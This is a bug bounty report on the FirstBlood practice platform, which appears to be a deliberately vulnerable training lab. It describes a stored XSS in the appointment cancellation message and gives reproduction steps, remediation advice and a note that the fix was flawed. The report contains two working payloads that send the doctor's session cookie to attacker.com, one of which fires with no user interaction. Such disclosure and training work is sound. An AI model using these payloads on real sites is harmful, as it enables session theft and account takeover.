FirstBlood-#492Stored XSS through the appointments cancelation message leads to ATO
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, holybugx Level 5 reported:

Description

Hello Sean,

When users cancel their appointments they can leave a message for the doctor. Proper sanitization is not implemented in place which makes Stored XSS possible on this endpoint. This vulnerability leads to a one-click account takeover.

Steps To Reproduce

  1. Make an appointment on the /book-appointment.html endpoint:

After doing so you will be given an appointment ID:

  1. Use your appointment ID on the /yourappointments.php API endpoint to manage your appointment:

  1. Intercept the request to Cancel Appointment and do the following changes before sending the final HTTP request:

  • Add the following payload as the value of the message parameter and forward the request:
"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='http://attacker.com?cookie='%2bdocument.cookie">

  1. Visit the /drpanel/cancelled.php endpoint using the doctor's accounts. If you click on the user's cancellation message, the XSS executes:

  • The drps cookie of the doctor will be sent to the attacker's server, which leads to the complete account takeover:

No User-Interaction Payload

The previous payload needs a click to execute. However, it is possible to craft a payload that needs no user interaction but doesn't work on Firefox:

"><xss/id="1"/tabindex="1"/style="font-size:%2010px"/autofocus/onfocusin="window.location.href='http://attacker.com?cookie='%2bdocument.cookie">

The above payload results in a no user-interaction XSS after the doctor visits the /drpanel/cancelled.php endpoint. The drps cookies will be sent to the attacker's controlled server which results in a complete account takeover.

Impact

  • XSS leading to one-click account takeover.

Remediation

  • Implement proper sanitization on the message parameter.
  • Set httponly cookies so that javascript can not access the cookies.
  • Remove/Expire the drps cookies after logging out.

Best Regards,

HolyBugx

P2 High

Endpoint: /drpanel/cancelled.php

Parameter: message

Payload: test"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='http://attacker.com?cookie='%2bdocument.cookie">


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.